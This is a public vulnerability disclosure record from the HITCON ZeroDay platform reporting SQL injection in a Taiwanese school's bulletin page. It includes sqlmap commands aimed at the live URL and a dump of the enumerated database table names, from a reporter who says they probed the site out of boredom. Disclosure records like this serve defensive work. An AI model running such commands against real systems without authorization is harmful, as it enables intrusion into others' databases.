Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00690
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 立志中學SQLi漏洞
- Introduction: 此網站存在SQi漏洞
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/09/01 16:47:59 : 新提交 (由 百鬼夜行 更新此狀態)
- 2022/09/01 16:48:58 : 新提交 (由 百鬼夜行 更新此狀態)
- 2022/09/01 17:20:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/05 15:09:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/05 16:30:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/09/05 16:30:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/11/01 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00690
- 通報者:bpejfjsp1 (百鬼夜行)
- 風險:低
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
我無聊找個學校戳戳看
發現這個網站存在SQLi漏洞
詳圖
sqlmap -u https://w5.lcvs.kh.edu.tw/bulletin/view.php?idno=64 --dbs
sqlmap -u https://w5.lcvs.kh.edu.tw/bulletin/view.php?idno=64 -D "performance_schema" --tables
+------------------------------------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_account_by_event_name |
| events_stages_summary_by_host_by_event_name |
| events_stages_summary_by_thread_by_event_name |
| events_stages_summary_by_user_by_event_name |
| events_stages_summary_global_by_event_name |
| events_statements_current |
| events_statements_history |
| events_statements_history_long |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest |
| events_statements_summary_by_host_by_event_name |
| events_statements_summary_by_program |
| events_statements_summary_by_thread_by_event_name |
| events_statements_summary_by_user_by_event_name |
| events_statements_summary_global_by_event_name |
| events_transactions_current |
| events_transactions_history |
| events_transactions_history_long |
| events_transactions_summary_by_account_by_event_name |
| events_transactions_summary_by_host_by_event_name |
| events_transactions_summary_by_thread_by_event_name |
| events_transactions_summary_by_user_by_event_name |
| events_transactions_summary_global_by_event_name |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_account_by_event_name |
| events_waits_summary_by_host_by_event_name |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_by_user_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| global_status |
| host_cache |
| hosts |
| memory_summary_by_account_by_event_name |
| memory_summary_by_host_by_event_name |
| memory_summary_by_thread_by_event_name |
| memory_summary_by_user_by_event_name |
| memory_summary_global_by_event_name |
| metadata_locks |
| mutex_instances |
| objects_summary_global_by_type |
| performance_timers |
| prepared_statements_instances |
| replication_applier_configuration |
| replication_applier_status |
| replication_applier_status_by_coordinator |
| replication_applier_status_by_worker |
| replication_connection_configuration |
| rwlock_instances |
| session_account_connect_attrs |
| session_connect_attrs |
| session_status |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_name |
| socket_summary_by_instance |
| status_by_account |
| status_by_host |
| status_by_thread |
| status_by_user |
| table_handles |
| table_io_waits_summary_by_index_usage |
| table_io_waits_summary_by_table |
| table_lock_waits_summary_by_table |
| threads |
| user_variables_by_thread |
| users |
+------------------------------------------------------+
為了秉持不看資料原則
我戳到點就好